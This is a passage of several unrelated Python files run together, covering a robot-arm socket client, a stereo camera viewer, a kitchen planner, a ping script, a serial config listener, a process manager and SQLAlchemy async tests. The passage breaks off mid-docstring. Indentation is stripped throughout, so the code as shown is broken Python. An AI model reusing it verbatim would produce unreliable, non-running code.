if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
s.send(data.encode('utf-8'))#socket傳送for python to translate str
Socket_sent_flag = True
feedback_str = s.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '70':# F 手臂為Ready狀態準備接收下一個運動指令
Arm_feedback = 0
socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '84':# T 手臂為忙碌狀態無法執行下一個運動指令
Arm_feedback = 1
socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
Arm_feedback = 6
socket_client_arm_state(Arm_feedback)
print("shutdown")
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
rospy.on_shutdown(myhook)
break
if start_input == 3:
pass
s.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
socket_server()
t.join()
# Ctrl+K Ctrl+C 添加行注释 Add line comment
# Ctrl+K Ctrl+U 删除行注释 Remove line comment
#Ctrl+] / [ 缩进/缩进行 Indent/outdent line |
stereo_camera.py | # MIT License
# Copyright (c) 2019,2020 JetsonHacks
# See license
# A very simple code snippet
# Using two CSI cameras (such as the Raspberry Pi Version 2) connected to a
# NVIDIA Jetson Nano Developer Kit (Rev B01) using OpenCV
# Drivers for the camera and OpenCV are included in the base image in JetPack 4.3+
# This script will open a window and place the camera stream from each camera in a window
# arranged horizontally.
# The camera streams are each read in their own thread, as when done sequentially there
# is a noticeable lag
# For better performance, the next step would be to experiment with having the window display
# in a separate thread
import cv2
import threading
import numpy as np
# gstreamer_pipeline returns a GStreamer pipeline for capturing from the CSI camera
# Flip the image by setting the flip_method (most common values: 0 and 2)
# display_width and display_height determine the size of each camera pane in the window on the screen
class CSI_Camera:
def __init__ (self) :
# Initialize instance variables
# OpenCV video capture element
self.video_capture = None
# The last captured image from the camera
self.frame = None
self.grabbed = False
# The thread where the video capture runs
self.read_thread = None
self.read_lock = threading.Lock()
self.running = False
def open(self, gstreamer_pipeline_string):
try:
self.video_capture = cv2.VideoCapture(
gstreamer_pipeline_string, cv2.CAP_GSTREAMER
)
except RuntimeError:
self.video_capture = None
print("Unable to open camera")
print("Pipeline: " + gstreamer_pipeline_string)
return
# Grab the first frame to start the video capturing
self.grabbed, self.frame = self.video_capture.read()
def start(self):
if self.running:
print('Video capturing is already running')
return None
# create a thread to read the camera image
if self.video_capture != None:
self.running=True
self.read_thread = threading.Thread(target=self.updateCamera)
self.read_thread.start()
return self
def stop(self):
self.running=False
self.read_thread.join()
def updateCamera(self):
# This is the thread to read images from the camera
while self.running:
try:
grabbed, frame = self.video_capture.read()
with self.read_lock:
self.grabbed=grabbed
self.frame=frame
except RuntimeError:
print("Could not read image from camera")
# FIX ME - stop and cleanup thread
# Something bad happened
def read(self):
with self.read_lock:
frame = self.frame.copy()
grabbed=self.grabbed
return grabbed, frame
def release(self):
if self.video_capture != None:
self.video_capture.release()
self.video_capture = None
# Now kill the thread
if self.read_thread != None:
self.read_thread.join()
# Currently there are setting frame rate on CSI Camera on Nano through gstreamer
# Here we directly select sensor_mode 3 (1280x720, 59.9999 fps)
def gstreamer_pipeline(
sensor_id=0,
sensor_mode=3,
capture_width=1280,
capture_height=720,
display_width=1280,
display_height=720,
framerate=30,
flip_method=0,
):
return (
"nvarguscamerasrc sensor-id=%d sensor-mode=%d ! "
"video/x-raw(memory:NVMM), "
"width=(int)%d, height=(int)%d, "
"format=(string)NV12, framerate=(fraction)%d/1 ! "
"nvvidconv flip-method=%d ! "
"video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! "
"videoconvert ! "
"video/x-raw, format=(string)BGR ! appsink"
% (
sensor_id,
sensor_mode,
capture_width,
capture_height,
framerate,
flip_method,
display_width,
display_height,
)
)
class stereo_camera():
def __init__(self):
left_camera = CSI_Camera()
left_camera.open(
gstreamer_pipeline(
sensor_id=0,
sensor_mode=3,
flip_method=0,
display_height=540,
display_width=960,
)
)
left_camera.start()
right_camera = CSI_Camera()
right_camera.open(
gstreamer_pipeline(
sensor_id=1,
sensor_mode=3,
flip_method=0,
display_height=540,
display_width=960,
)
)
right_camera.start()
print(left_camera.video_capture.isOpened())
print(right_camera.video_capture.isOpened())
cv2.namedWindow("CSI Cameras", cv2.WINDOW_AUTOSIZE)
if (
not left_camera.video_capture.isOpened()
or not right_camera.video_capture.isOpened()
):
# Cameras did not open, or no camera attached
print("Unable to open any cameras")
# TODO: Proper Cleanup
SystemExit(0)
self.left_camera = left_camera
self.right_camera = right_camera
def run_stereo_camera(self):
while cv2.getWindowProperty("CSI Cameras", 0) >= 0 :
_ , left_image=self.left_camera.read()
_ , right_image=self.right_camera.read()
camera_images = np.hstack((left_image, right_image))
cv2.imshow("CSI Cameras", camera_images)
# This also acts as
keyCode = cv2.waitKey(30) & 0xFF
# Stop the program on the ESC key
if keyCode == 27:
break
def stop_stereo_camera(self):
self.left_camera.stop()
self.left_camera.release()
self.right_camera.stop()
self.right_camera.release()
cv2.destroyAllWindows()
if __name__ == "__main__":
cams = stereo_camera()
cams.run_stereo_camera()
cams.stop_stereo_camera()
|
KitchenPlanner.py | # Copyright 2015 Ciara Kamahele-Sanfratello
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from Planner import Planner
from Primitives.KitchenPrimitives import KitchenState, KitchenAction
import subprocess, threading, time, Queue
class KitchenPlanner(Planner):
def __init__(self):
self.path = '/Users/ciara/Dropbox/Ciara/LIS/planner'
self.plan = None
def write_input_file(self, initial_state, goal_state):
f = open(self.path + '/temp.txt', 'w')
f.write('%d\n' % initial_state.numLocs)
f.write('%d\n' % initial_state.numObjs)
f.write('%.2f\n' % initial_state.move_prob)
f.write('%.2f\n' % initial_state.pick_prob)
f.write('%.2f\n' % initial_state.place_prob)
f.write('%.2f\n' % initial_state.look_obs)
for x in initial_state.robotLoc:
f.write('%.2f\n' % x)
for x in initial_state.heldObj:
f.write('%.2f\n' % x)
for locs in initial_state.objLocs:
for x in locs:
f.write('%.2f\n' % x)
for x in initial_state.freeLocs:
f.write('%.2f\n' % x)
for x in goal_state.robotLoc:
f.write('%.2f\n' % x)
for x in goal_state.heldObj:
f.write('%.2f\n' % x)
for locs in goal_state.objLocs:
for x in locs:
f.write('%.2f\n' % x)
for x in goal_state.freeLocs:
f.write('%.2f\n' % x)
f.close()
def run_cmd(self, timeout, weight):
q = Queue.Queue()
def target(q):
input_file = open('%s/temp.txt' % self.path)
#print 'waiting to replan'
#raw_input()
#print 'replanning with w=%.2f' % weight
self.process = subprocess.Popen(['%s/main' % self.path,
'--file=true',
'--problem=kitchen',
'--weight=' + str(weight),
'--epsilon=0.0'],
stdin=input_file,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = self.process.communicate()
q.put(out)
thread = threading.Thread(target=target, args=[q])
start_time = time.time()
thread.start()
thread.join(timeout)
if thread.is_alive():
self.process.terminate()
thread.join()
print "killed"
return False
else:
#print 'elapsed time: %.2f' % (time.time() - start_time)
self.parse_plan(q.get())
return True
def parse_plan(self, out):
try:
plan = out.split('\n')
self.plan = []
for i in range(len(plan)):
if plan[i][0:4] == 'move':
args = plan[i][5:].split('_')
self.plan.append(KitchenAction('am', [int(arg) for arg in args]))
elif plan[i][0:4] == 'pick':
args = plan[i][5:].split('_')
self.plan.append(KitchenAction('api', [int(arg) for arg in args]))
elif plan[i][0:5] == 'place':
args = plan[i][6:].split('_')
self.plan.append(KitchenAction('apl', [int(arg) for arg in args]))
elif plan[i][0:10] == 'look_robot':
args = plan[i][11:].split('_')
self.plan.append(KitchenAction('alr', [int(arg) for arg in args]))
elif plan[i][0:9] == 'look_hand':
args = plan[i][10:].split('_')
self.plan.append(KitchenAction('alh', [int(arg) for arg in args]))
elif plan[i][0:8] == 'look_obj':
args = plan[i][9:].split('_')
self.plan.append(KitchenAction('alo', [int(arg) for arg in args]))
self.plan.append(KitchenAction('arg'))
except:
print "parse_plan exception"
print out
#for a in self.plan:
#print a
def next_action(self, initial_state, goal_state, prev_obs):
replanned = False
# replan
if self.plan is None or prev_obs is None or prev_obs == 'onone':
replanned = True
self.write_input_file(initial_state, goal_state)
success = False
#weight = 0.15
#success = self.run_cmd(10, 0.15)
#if not success:
#weight = 0.0
#success = self.run_cmd(600, 0.0)
success = self.run_cmd(600, 0.35)
if not success:
print "could not make a plan in 10 minutes"
assert(False)
#while (success and weight < 0.35):
#success = self.run_cmd(10, weight + 0.05)
#weight += 0.05
#print "done replanning"
return (self.plan.pop(0), 1 if replanned else 0)
|
ping_thread_basic.py | #!/usr/bin/env python
from threading import Thread
import subprocess
from queue import Queue
num_threads = 3
queue = Queue()
ips = ["10.0.1.1", "10.0.1.3", "10.0.1.11", "10.0.1.51"]
def pinger(i, q):
"""Pings subnet"""
while True:
ip = q.get()
print("Thread %s: Pinging %s" % (i, ip))
ret = subprocess.call("ping -c 1 %s" % ip,
shell=True,
stdout=open('/dev/null', 'w'),
stderr=subprocess.STDOUT)
if ret == 0:
print("%s: is alive" % ip)
else:
print("%s: did not respond" % ip)
q.task_done()
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
for ip in ips:
queue.put(ip)
print("Main Thread Waiting")
queue.join()
print("Done")
#线程,队列 ,从队列中取出一个地址,由线程执行
#ping无限循环,线程不会死亡,守护线程
#一个缓冲池,三个线程等告诉绑定, 元素放入队列
#queue.join() 调用join导致程序主线程等待,直到队列为空
|
iombian_serial_communication_handler.py | #!/usr/bin/env python3
import json
import logging
import serial
import threading
logger = logging.getLogger(__name__)
class IoMBianSerialConfiguratorHandler():
SAVE_CONFIG_DELAY = 2
def __init__(self, file_config_handler, port="/dev/ttyGS0", baudrate=115200, timeout=0.1):
self.file_config_handler = file_config_handler
self.port = port
self.baudrate = baudrate
self.timeout = timeout
self.serial_listener_thread = None
self.listen = False
def start(self):
if self.file_config_handler.execute_command("is_configured"):
logger.info("Device already configured, Serial Configurator Handler will not be started")
self.stop()
return
logger.debug("Starting Serial Configurator Handler")
self.listen = True
self.serial_listener_thread = threading.Thread(target=self.__serial_listener)
self.serial_listener_thread.start()
def stop(self):
logger.debug("Stopping Serial Configurator Handler")
self.listen = False
if self.serial_listener_thread:
self.serial_listener_thread.join()
self.serial_listener_thread = None
def __serial_listener(self):
number_of_curly_brackets = 0
config_string = ""
while self.listen:
try:
serial_conn = serial.Serial(port=self.port, baudrate=self.baudrate, timeout=self.timeout)
logger.info(f"Connection established with serial port: '{self.port}'")
except serial.serialutil.SerialException as error:
logger.error(f"Serial port '{self.port}' cannot be found")
break
while(self.listen):
try:
data = serial_conn.read()
except serial.serialutil.SerialException as error:
logger.error("Serial exception reading serial connection!")
break
if len(data) == 0:
continue
try:
data_decoded = data.decode('utf-8')
except:
logger.debug(f"Error decoding data as UTF-8: {data}")
continue
if data_decoded == '{':
number_of_curly_brackets += 1
elif data_decoded == '}':
number_of_curly_brackets -= 1
config_string += data_decoded
if number_of_curly_brackets == 0:
try:
config = json.loads(config_string)
logger.debug(config)
logger.info("New configuration received")
threading.Timer(self.SAVE_CONFIG_DELAY, self.file_config_handler.execute_command, ["save_config", config]).start()
except json.decoder.JSONDecodeError as error:
logger.debug("Non valid json string: {}".format(config_string))
config_string = ""
serial_conn.close()
|
process_manager.py | import logging
import queue as queue_lib
import signal
import sys
from multiprocessing import Process, Queue
import GPUtil
from tornado.ioloop import IOLoop
import utils.constants as c
class ProcessManager():
"""A ProcessManager class is used for controlling the multi-processing features of this application.
"""
def __init__(self):
"""Initialization method.
"""
# Creates a queue object
self.queue = Queue()
# Creates an process object with a specific target
self.current_process = Process(
target=self.handle_process, args=(self.queue,), daemon=False)
# Starts the process
self.current_process.start()
def handle_process(self, queue):
"""It handles a new process by calling a specific IOLoop and starting it with a callback.
Args:
queue (Queue): A queue object.
"""
# Creates an IOLoop object
loop = IOLoop()
# Spawns the callback function
loop.spawn_callback(self.worker, queue)
# Starts the loop
loop.start()
def add_process(self, process):
"""Adds a new process to the queue.
Args:
process (Process): A new process to be added to the queue.
"""
# Puts a new process in the queue
self.queue.put(process)
def get_gpu_config(self):
"""Gathers the amount of load and memory that a process should use on the GPU.
Returns:
The amount of load and memory that a process should use.
"""
# Gathers the load per process
load_per_process = float(c.GPU_MAX_LOAD)
# Gathers the memory per process
mem_per_process = float(c.GPU_MAX_MEMORY)
return load_per_process, mem_per_process
def get_device(self):
"""Gathers an avaliable GPU or CPU for further processing.
Returns:
A configuration object containing the device's information.
"""
# Tries to check if there is an avaliable GPU
try:
# Gathers a list of GPUs
gpus = GPUtil.getGPUs()
# For each GPU
for g in gpus:
# Logs its information
logging.info(g.name)
# Calculates the load and memory per process
load_per_process, mem_per_process = self.get_gpu_config()
# Calculates the maximum possible load for an avaliable GPU
max_load = 1 - load_per_process
# # Calculates the maximum possible memory for an avaliable GPU
max_mem = 1 - mem_per_process
# Gathers the first avaliable GPU
device_id = GPUtil.getFirstAvailable(
order='first', maxLoad=max_load, maxMemory=max_mem, attempts=3, interval=3, verbose=False)[0]
# Checks if the device id exists
if device_id is not None:
# Creates a configuration object
config = {
'gpu': {
'DEVICE_ID': device_id,
'MEMORY_FRACTION': mem_per_process
}
}
return config
# If there is no avaliable GPU
except Exception as e:
logging.warning(e)
# Creates a different configuration object
config = {
'cpu': {
}
}
return config
def drain_pool(self, pool):
"""Drains all lingering processes in the pool.
Args:
pool (list): The pool itself.
Returns:
The drained pool.
"""
# Creates a new pool
new_pool = []
# For every process in the pool
for p in pool:
# Checks if the process is alive
if not p.is_alive():
# If not, terminates it
p.terminate()
# If it is alive
else:
# Appends the process to the new pool
new_pool.append(p)
return new_pool
async def worker(self, queue):
"""The worker method itself.
Essentially, it is responsible for draining and adding new processes to the pool.
Args:
queue (Queue): A queue object.
"""
def empty_process_pool(pool):
"""Empties a pool of processes.
Args:
pool (list): The pool to be emptied.
"""
# For every process in the pool
for p in pool:
# Terminates the process
p.terminate()
def signal_handler(*args):
"""Forces the interruption signal to be intercepted by the main process.
"""
# Empties the CPU pool
empty_process_pool(cpu_pool)
# Empties the GPU pool
empty_process_pool(gpu_pool)
logging.warning('Interrupting the process manager ...')
# Exits the process
sys.exit()
# Initialize the job flag as false
job = False
# Creates an empty list for the CPU pool
cpu_pool = []
# Creates an empty list for the GPU pool
gpu_pool = []
# Setting the responsibility of who will receive the interruption signal
signal.signal(signal.SIGINT, signal_handler)
# While the loop is true
while True:
# Tries to the drain the pools and add a process
try:
# Drains the CPU pool
cpu_pool = self.drain_pool(cpu_pool)
# Drains the GPU pool
gpu_pool = self.drain_pool(gpu_pool)
# Gathers the current job
job = queue.get()
# If the job exists
if job:
# Gathers the processor
processor = job["target"]()
# Gathers the device configuration
device = self.get_device()
# Adds to the job object the device configuration
job["data"]["device_config"] = device
# If the device configuration is set to the GPU
if device.get("gpu"):
# Creates the process
p = Process(target=processor.consume, name="brainy_gpu-" +
str(len(gpu_pool) + 1), args=(job["data"],), daemon=False)
# Starts the process
p.start()
# Appends the process to the GPU pool
gpu_pool.append(p)
logging.info('Adding process to GPU pool ...')
# If the device configuration is set to the CPU
else:
# Creates the process
p = Process(target=processor.consume, name="brainy_cpu-" +
str(len(cpu_pool) + 1), args=(job["data"],), daemon=False)
# Starts the process
p.start()
# Appends the process to the CPU pool
cpu_pool.append(p)
logging.info('Adding process to CPU pool ...')
# Whenever the queue is empty, logs the exception
except queue_lib.Empty as e:
logging.warning(e)
|
test_engine_py3k.py | import asyncio
from sqlalchemy import Column
from sqlalchemy import create_engine
from sqlalchemy import delete
from sqlalchemy import event
from sqlalchemy import exc
from sqlalchemy import func
from sqlalchemy import inspect
from sqlalchemy import Integer
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from sqlalchemy import testing
from sqlalchemy import text
from sqlalchemy import union_all
from sqlalchemy.ext.asyncio import async_engine_from_config
from sqlalchemy.ext.asyncio import create_async_engine
from sqlalchemy.ext.asyncio import engine as _async_engine
from sqlalchemy.ext.asyncio import exc as asyncio_exc
from sqlalchemy.ext.asyncio.base import ReversibleProxy
from sqlalchemy.ext.asyncio.engine import AsyncConnection
from sqlalchemy.ext.asyncio.engine import AsyncEngine
from sqlalchemy.pool import AsyncAdaptedQueuePool
from sqlalchemy.testing import assertions
from sqlalchemy.testing import async_test
from sqlalchemy.testing import combinations
from sqlalchemy.testing import config
from sqlalchemy.testing import engines
from sqlalchemy.testing import eq_
from sqlalchemy.testing import expect_raises
from sqlalchemy.testing import expect_raises_message
from sqlalchemy.testing import fixtures
from sqlalchemy.testing import is_
from sqlalchemy.testing import is_false
from sqlalchemy.testing import is_none
from sqlalchemy.testing import is_not
from sqlalchemy.testing import is_true
from sqlalchemy.testing import mock
from sqlalchemy.testing import ne_
from sqlalchemy.util.concurrency import greenlet_spawn
class AsyncFixture:
@config.fixture(
params=[
(rollback, run_second_execute, begin_nested)
for rollback in (True, False)
for run_second_execute in (True, False)
for begin_nested in (True, False)
]
)
def async_trans_ctx_manager_fixture(self, request, metadata):
rollback, run_second_execute, begin_nested = request.param
from sqlalchemy import Table, Column, Integer, func, select
t = Table("test", metadata, Column("data", Integer))
eng = getattr(self, "bind", None) or config.db
t.create(eng)
async def run_test(subject, trans_on_subject, execute_on_subject):
async with subject.begin() as trans:
if begin_nested:
if not config.requirements.savepoints.enabled:
config.skip_test("savepoints not enabled")
if execute_on_subject:
nested_trans = subject.begin_nested()
else:
nested_trans = trans.begin_nested()
async with nested_trans:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
# for nested trans, we always commit/rollback on the
# "nested trans" object itself.
# only Session(future=False) will affect savepoint
# transaction for session.commit/rollback
if rollback:
await nested_trans.rollback()
else:
await nested_trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction "
"inside context manager. Please complete the "
"context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(
t.insert(), {"data": 12}
)
else:
await trans.execute(
t.insert(), {"data": 12}
)
# outside the nested trans block, but still inside the
# transaction block, we can run SQL, and it will be
# committed
if execute_on_subject:
await subject.execute(t.insert(), {"data": 14})
else:
await trans.execute(t.insert(), {"data": 14})
else:
if execute_on_subject:
await subject.execute(t.insert(), {"data": 10})
else:
await trans.execute(t.insert(), {"data": 10})
if trans_on_subject:
if rollback:
await subject.rollback()
else:
await subject.commit()
else:
if rollback:
await trans.rollback()
else:
await trans.commit()
if run_second_execute:
with assertions.expect_raises_message(
exc.InvalidRequestError,
"Can't operate on closed transaction inside "
"context "
"manager. Please complete the context manager "
"before emitting further commands.",
):
if execute_on_subject:
await subject.execute(t.insert(), {"data": 12})
else:
await trans.execute(t.insert(), {"data": 12})
expected_committed = 0
if begin_nested:
# begin_nested variant, we inserted a row after the nested
# block
expected_committed += 1
if not rollback:
# not rollback variant, our row inserted in the target
# block itself would be committed
expected_committed += 1
if execute_on_subject:
eq_(
await subject.scalar(select(func.count()).select_from(t)),
expected_committed,
)
else:
with subject.connect() as conn:
eq_(
await conn.scalar(select(func.count()).select_from(t)),
expected_committed,
)
return run_test
class EngineFixture(AsyncFixture, fixtures.TablesTest):
__requires__ = ("async_dialect",)
@testing.fixture
def async_engine(self):
return engines.testing_engine(asyncio=True, transfer_staticpool=True)
@classmethod
def define_tables(cls, metadata):
Table(
"users",
metadata,
Column("user_id", Integer, primary_key=True, autoincrement=False),
Column("user_name", String(20)),
)
@classmethod
def insert_data(cls, connection):
users = cls.tables.users
connection.execute(
users.insert(),
[{"user_id": i, "user_name": "name%d" % i} for i in range(1, 20)],
)
class AsyncEngineTest(EngineFixture):
__backend__ = True
@testing.fails("the failure is the test")
@async_test
async def test_we_are_definitely_running_async_tests(self, async_engine):
async with async_engine.connect() as conn:
eq_(await conn.scalar(text("select 1")), 2)
@async_test
async def test_interrupt_ctxmanager_connection(
self, async_engine, async_trans_ctx_manager_fixture
):
fn = async_trans_ctx_manager_fixture
async with async_engine.connect() as conn:
await fn(conn, trans_on_subject=False, execute_on_subject=True)
def test_proxied_attrs_engine(self, async_engine):
sync_engine = async_engine.sync_engine
is_(async_engine.url, sync_engine.url)
is_(async_engine.pool, sync_engine.pool)
is_(async_engine.dialect, sync_engine.dialect)
eq_(async_engine.name, sync_engine.name)
eq_(async_engine.driver, sync_engine.driver)
eq_(async_engine.echo, sync_engine.echo)
@async_test
async def test_engine_eq_ne(self, async_engine):
e2 = _async_engine.AsyncEngine(async_engine.sync_engine)
e3 = testing.engines.testing_engine(
asyncio=True, transfer_staticpool=True
)
eq_(async_engine, e2)
ne_(async_engine, e3)
is_false(async_engine == None)
@async_test
@testing.requires.python37
async def test_no_attach_to_event_loop(self, testing_engine):
"""test #6409"""
import asyncio
import threading
errs = []
def go():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
async def main():
tasks = [task() for _ in range(2)]
await asyncio.gather(*tasks)
await engine.dispose()
async def task():
async with engine.begin() as connection:
result = await connection.execute(select(1))
result.all()
try:
engine = testing_engine(
asyncio=True, transfer_staticpool=False
)
asyncio.run(main())
except Exception as err:
errs.append(err)
t = threading.Thread(target=go)
t.start()
t.join()
if errs:
raise errs[0]
@async_test
async def test_connection_info(self, async_engine):
async with async_engine.connect() as conn:
conn.info["foo"] = "bar"
eq_(conn.sync_connection.info, {"foo": "bar"})
@async_test
async def test_connection_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
c2 = _async_engine.AsyncConnection(
async_engine, conn.sync_connection
)
eq_(conn, c2)
async with async_engine.connect() as c3:
ne_(conn, c3)
is_false(conn == None)
@async_test
async def test_transaction_eq_ne(self, async_engine):
async with async_engine.connect() as conn:
t1 = await conn.begin()
t2 = _async_engine.AsyncTransaction._regenerate_proxy_for_target(
t1._proxied
)
eq_(t1, t2)
is_false(t1 == None)
def test_clear_compiled_cache(self, async_engine):
async_engine.sync_engine._compiled_cache["foo"] = "bar"
eq_(async_engine.sync_engine._compiled_cache["foo"], "bar")
async_engine.clear_compiled_cache()
assert "foo" not in async_engine.sync_engine._compiled_cache
def test_execution_options(self, async_engine):
a2 = async_engine.execution_options(foo="bar")
assert isinstance(a2, _async_engine.AsyncEngine)
eq_(a2.sync_engine._execution_options, {"foo": "bar"})
eq_(async_engine.sync_engine._execution_options, {})
"""
attr uri, pool, dialect, engine, name, driver, echo
methods clear_compiled_cache, update_execution_options,
execution_options, get_execution_options, dispose
"""
@async_test
async def test_proxied_attrs_connection(self, async_engine):
conn = await async_engine.connect()
sync_conn = conn.sync_connection
is_(conn.engine, async_engine)
is_(conn.closed, sync_conn.closed)
is_(conn.dialect, async_engine.sync_engine.dialect)
eq_(conn.default_isolation_level, sync_conn.default_isolation_level)
@async_test
async def test_transaction_accessor(self, async_engine):
async with async_engine.connect() as conn:
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
trans = await conn.begin()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
nested = await conn.begin_nested()
is_true(conn.in_transaction())
is_true(conn.in_nested_transaction())
is_(
conn.get_nested_transaction().sync_transaction,
nested.sync_transaction,
)
eq_(conn.get_nested_transaction(), nested)
is_(
trans.sync_transaction, conn.get_transaction().sync_transaction
)
await nested.commit()
is_true(conn.in_transaction())
is_false(conn.in_nested_transaction())
await trans.rollback()
is_none(conn.get_transaction())
is_false(conn.in_transaction())
is_false(conn.in_nested_transaction())
@testing.requires.queue_pool
@async_test
async def test_invalidate(self, async_engine):
conn = await async_engine.connect()
is_(conn.invalidated, False)
connection_fairy = await conn.get_raw_connection()
is_(connection_fairy.is_valid, True)
dbapi_connection = connection_fairy.dbapi_connection
await conn.invalidate()
if testing.against("postgresql+asyncpg"):
assert dbapi_connection._connection.is_closed()
new_fairy = await conn.get_raw_connection()
is_not(new_fairy.dbapi_connection, dbapi_connection)
is_not(new_fairy, connection_fairy)
is_(new_fairy.is_valid, True)
is_(connection_fairy.is_valid, False)
@async_test
async def test_get_dbapi_connection_raise(self, async_engine):
conn = await async_engine.connect()
with testing.expect_raises_message(
exc.InvalidRequestError,
"AsyncConnection.connection accessor is not "
"implemented as the attribute",
):
conn.connection
@async_test
async def test_get_raw_connection(self, async_engine):
conn = await async_engine.connect()
pooled = await conn.get_raw_connection()
is_(pooled, conn.sync_connection.connection)
@async_test
async def test_isolation_level(self, async_engine):
conn = await async_engine.connect()
sync_isolation_level = await greenlet_spawn(
conn.sync_connection.get_isolation_level
)
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, sync_isolation_level)
await conn.execution_options(isolation_level="SERIALIZABLE")
isolation_level = await conn.get_isolation_level()
eq_(isolation_level, "SERIALIZABLE")
await conn.close()
@testing.requires.queue_pool
@async_test
async def test_dispose(self, async_engine):
c1 = await async_engine.connect()
c2 = await async_engine.connect()
await c1.close()
await c2.close()
p1 = async_engine.pool
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 2)
await async_engine.dispose()
if isinstance(p1, AsyncAdaptedQueuePool):
eq_(async_engine.pool.checkedin(), 0)
is_not(p1, async_engine.pool)
@testing.requires.independent_connections
@async_test
async def test_init_once_concurrency(self, async_engine):
c1 = async_engine.connect()
c2 = async_engine.connect()
await asyncio.wait([c1, c2])
@async_test
async def test_connect_ctxmanager(self, async_engine):
async with async_engine.connect() as conn:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
@async_test
async def test_connect_plain(self, async_engine):
conn = await async_engine.connect()
try:
result = await conn.execute(select(1))
eq_(result.scalar(), 1)
finally:
await conn.close()
@async_test
async def test_connection_not_started(self, async_engine):
conn = async_engine.connect()
testing.assert_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncConnection context has not been started and "
"object has not been awaited.",
conn.begin,
)
@async_test
async def test_transaction_commit(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
await conn.execute(delete(users))
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_savepoint_rollback_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_savepoint_commit_noctx(self, async_engine):
users = self.tables.users
async with async_engine.begin() as conn:
savepoint = await conn.begin_nested()
await conn.execute(delete(users))
await savepoint.commit()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 0)
@async_test
async def test_transaction_rollback(self, async_engine):
users = self.tables.users
async with async_engine.connect() as conn:
trans = conn.begin()
await trans.start()
await conn.execute(delete(users))
await trans.rollback()
async with async_engine.connect() as conn:
eq_(await conn.scalar(select(func.count(users.c.user_id))), 19)
@async_test
async def test_conn_transaction_not_started(self, async_engine):
async with async_engine.connect() as conn:
trans = conn.begin()
with expect_raises_message(
asyncio_exc.AsyncContextNotStarted,
"AsyncTransaction context has not been started "
"and object has not been awaited.",
):
await trans.rollback(),
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_some_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0.1,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@testing.requires.queue_pool
@async_test
async def test_pool_exhausted_no_timeout(self, async_engine):
engine = create_async_engine(
testing.db.url,
pool_size=1,
max_overflow=0,
pool_timeout=0,
)
async with engine.connect():
with expect_raises(exc.TimeoutError):
await engine.connect()
@async_test
async def test_create_async_engine_server_side_cursor(self, async_engine):
testing.assert_raises_message(
asyncio_exc.AsyncMethodRequired,
"Can't set server_side_cursors for async engine globally",
create_async_engine,
testing.db.url,
server_side_cursors=True,
)
def test_async_engine_from_config(self):
config = {
"sqlalchemy.url": str(testing.db.url),
"sqlalchemy.echo": "true",
}
engine = async_engine_from_config(config)
assert engine.url == testing.db.url
assert engine.echo is True
assert engine.dialect.is_async is True
class AsyncEventTest(EngineFixture):
"""The engine events all run in their normal synchronous context.
